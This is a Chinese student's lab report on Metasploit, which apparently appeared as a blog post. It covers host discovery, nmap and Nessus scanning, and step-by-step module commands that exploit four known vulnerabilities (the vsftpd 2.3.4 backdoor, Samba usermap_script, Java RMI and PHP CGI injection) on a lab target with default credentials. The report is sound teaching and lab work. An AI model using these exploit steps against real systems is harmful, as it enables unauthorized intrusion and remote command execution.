20222426 2024-2025-1 《网络与系统攻防技术》实验六实验报告
20222426 2024-2025-1 《网络与系统攻防技术》实验六实验报告
1.实验内容
Metasploit主要由框架核心、模块、数据库等组成。框架核心负责协调各个模块的运行。模块包括漏洞利用模块(Exploit Modules)、辅助模块(Auxiliary Modules)、payload模块等。数据库用于存储测试过程中的信息,如目标主机信息、漏洞利用结果等。
启动Metasploit:在终端中输入“msfconsole”命令启动Metasploit控制台。
搜索模块:使用“search”命令可以搜索特定的漏洞利用模块或其他模块。例如,搜索ms17_010漏洞利用模块,可以输入“search ms17_010”。
选择模块:使用“use”命令选择要使用的模块。例如,选择一个漏洞利用模块,可以输入“use exploit/windows/smb/ms17_010_eternalblue”。
查看模块信息:使用“info”命令可以查看所选模块的详细信息,包括漏洞描述、适用平台、所需参数等。
设置模块参数:使用“set”命令设置模块所需的参数,如目标IP地址、端口等。例如,设置目标IP地址,可以输入“set RHOST 192.168.1.100”。
运行模块:使用“run”或“exploit”命令运行所选的模块。以ms17_010漏洞为例,按照上述步骤选择模块、设置参数并运行,成功后可能获取到目标系统的shell权限。
Metasploit的高级功能:
自定义Payload:Metasploit允许用户自定义Payload,以满足特定的渗透测试需求。用户可以选择不同的编程语言(如C、Python、Ruby等)和不同的平台(如Windows、Linux、Android等)来编写Payload。
与其他工具集成:Metasploit可以与Nmap、Wireshark等工具集成,提高渗透测试的效率和效果。
数据库管理:Metasploit使用数据库来存储测试过程中的信息。用户可以通过Metasploit的数据库后端命令来分析和管理这些信息。
Metasploit是一个强大的工具,但必须在合法授权和遵循道德规范的前提下使用。未经授权使用Metasploit对网络或系统进行攻击是非法的。
2.实验过程
用户名:msfadmin
密码:msfadmin
使用ifconfig查看ip,
靶机IP是192.168.190.149。
(1)前期渗透
①主机发现(可用Aux中的arp_sweep,search一下就可以use)
目标ip是192.168.190.149。
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
可以看到21,80,139,1099端口是打开的。
③选做:也可以扫系统版本、漏洞等。
使用Nessus扫描。
版本Linux Kernel 2.6 on Ubuntu 8.04 (hardy)
可以看到有很多的漏洞。
也可以查看开放的端口,这里的结果比使用nmap扫描更加详细。
(2)Vsftpd源码包后门漏洞(21端口)
漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
利用步骤:
在kali中执行msfconsole 启动metasploit
use exploit/unix/ftp/vsftpd_234_backdoor //选择漏洞
set RHOST 192.168.190.149//设置要攻击的机器IP
exploit/run 开始攻击
利用成功,
执行uname –a、 pwd、 id、whoami命令验证。
(3)SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
这里没有找到相关漏洞,应该是漏报了。
利用步骤:
use exploit/multi/samba/usermap_script 选择漏洞
set RHOST 192.168.190.149 设置要攻击的机器IP
exploit 开始攻击
利用成功,执行uname–a验证。
(4)Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
操作步骤:
首先查看1099端口是否打开。
然后在MSF中:
use exploit/multi/misc/java_rmi_server
show options 查看配置参数
set 192.168.190.149 (靶机IP)
exploit/run
sessions -i id
shell (进入meterpreter时,使用whoami验证下)
(5)PHP CGI参数执行注入漏洞(80端口)
漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
这个漏洞是CVE-2012-1823,但是没有在Nessus的结果里面找到这个漏洞,又漏报了。
在kali中执行msfconsole,启动metasploit
msf > use exploit/multi/http/php_cgi_arg_injection 选择漏洞
set RHOST 192.168.190.149 设置要攻击的机器IP
exploit/run 开始攻击
3.问题及解决方案
- 问题1:Nessus下载不成功。
- 问题1解决方案:手动更新插件,在命令行使用“nessuscli update –all”命令手动更新Nessus及其插件。
4.学习感悟、思考等
本次实验虽然是在已知漏洞的前提下完成的,但若未提供具体漏洞信息,可能需要深入查阅相关资料,并结合使用nmap和Nessus等扫描工具的结果,对每个开放的端口逐一进行试探和分析,以探索并利用潜在的漏洞,最终达成渗透攻击的目的。
参考资料
posted on 2024-11-15 23:19 20222426魏宏宇 阅读(13) 评论(0) 编辑 收藏 举报